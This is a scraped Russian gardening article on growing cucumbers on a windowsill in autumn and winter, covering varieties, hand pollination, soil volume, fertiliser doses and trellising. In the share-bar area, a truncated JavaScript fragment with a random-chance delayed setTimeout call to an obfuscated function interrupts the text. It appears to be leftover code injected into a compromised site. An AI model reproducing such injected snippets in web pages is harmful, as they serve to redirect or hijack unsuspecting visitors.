www.osnovosti.ru
smk-pride.ru

Огурцы на подоконнике

КАК ВЫРАСТИТЬ ОГУРЦЫ НА ОКНЕ БЕЗ ДОПОЛНИТЕЛЬНОГО ОСВЕЩЕНИЯ

Какие сорта огурца можно выращивать в квартире в осенне-зимний период? И как это лучше делать?

Как вырастить огурцы на окне без дополнительного освещения
Огурцы

Выращивание огурцов в квартире в осенне-зимний период – увлекательное, но не простое дело. В первую очередь следует подобрать гибриды и сорта, способные плодоносить в условиях недостатка освещенности, устойчивые к перепадам температуры. Для самого раннего посева с 20 февраля без применения электродосвечивания в средней полосе России лучше подойдут пчелоопыляемые гибриды Манул, Эстафета, ТСХА 28, Горностай, Гладиатор (опылитель). Опыление их проводят искусственно. Одним только что распустившимся мужским цветком опыляют 2–3 женских цветка.

Можно сеять и партенокарпические гибриды, которые не нуждаются в опылении. Это, к примеру, могут бытьАмур, Буян, Веселые друзья, Грибовчанка, Дружная семейка, Заречье, Легенда, Мальчик с пальчик, Подмосковные вечера, Сентябрьский, Стелла и некоторые другие. Высевать их лучше в первой – второй декаде марта, когда существенно увеличивается продолжительность светового дня. Хороший урожай огурцов можно обеспечить, если на одно растение объем почвы будет составлять не менее 5 л. Важно также соблюдать оптимальный режим влажности почвы и питания растения. Избыток, как и недостаток необходимых элементов питания, сразу отразится на развитии растений. Подкармливать огурцы в период плодоношения следует малыми дозами через 1–2 недели (2 столовые ложки нитрофоски или другого комплексного удобрения – на 3 л воды, 1 стакан под растение), совмещая с обильным поливом. Каждый раз надо добавлять и по 1 чайной ложке сульфата магния.

На подоконнике необходимо соорудить шпалеру из шпагата, которая поможет поддержать огурцу стебель по мере его роста. Формируют растения практически так же, как и при выращивании в теплице. На окне можно разместить не более 3–4 растений огурца.

источник

Share andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Enjoy:
  • Добавить ВКонтакте заметку об этой странице
  • Twitter
  • Facebook
  • Яндекс.Закладки
  • Одноклассники

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.

Яндекс.Метрика